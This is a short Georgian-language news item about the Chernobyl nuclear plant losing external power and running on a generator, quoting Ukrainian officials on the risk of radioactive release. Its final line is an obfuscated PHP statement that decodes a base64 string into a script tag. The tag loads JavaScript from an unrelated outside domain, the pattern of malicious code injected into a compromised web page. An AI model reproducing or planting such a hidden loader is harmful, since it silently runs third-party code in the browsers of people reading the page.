tube
ავერსი jaluzi
უკრაინის პრეზიდენტის ადმინისტრაციის უფროსის განცხადებით, ვითარება ჩერნობილის დაკონსერვებულ ატომურ სადგურზე საფრთხის შემცველია, რადგან ის ელექტროენერგიის გარეშეა დარჩენილი და გენერატორზე მუშაობს.
 
უკრაინის პრეზიდენტის მრჩეველი მიხაილ პოდოლიაკის თქმით კი, ჩერნობილში ხვალ სადგურს ელექტროენერგია აღარ ექნება. 
 
"გენერატორის მუშაობის ვადა 48 საათით განისაზღვრება. ანუ გამოდის, რომ ხვალ სადგურს ელექტროენერგია აღარ ექნება და იქმნება გაჟონვის რეალური საფრთხე," - განმარტავს მიხაილ პოდოლიაკი.
 
ცნობისთვის, უკრაინის სახელმწიფო ბირთვულმა კომპანიამ გუშინ განაცხადა, რომ ჩერნობილის ატომურ ელექტროსადგურს ელექტროენერგიის მიწოდება შეუწყდა და არსებობს საფრთხე იმისა, რომ რადიაქტიური ნივთიერებების გამოყოფა მოხდეს.
840
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");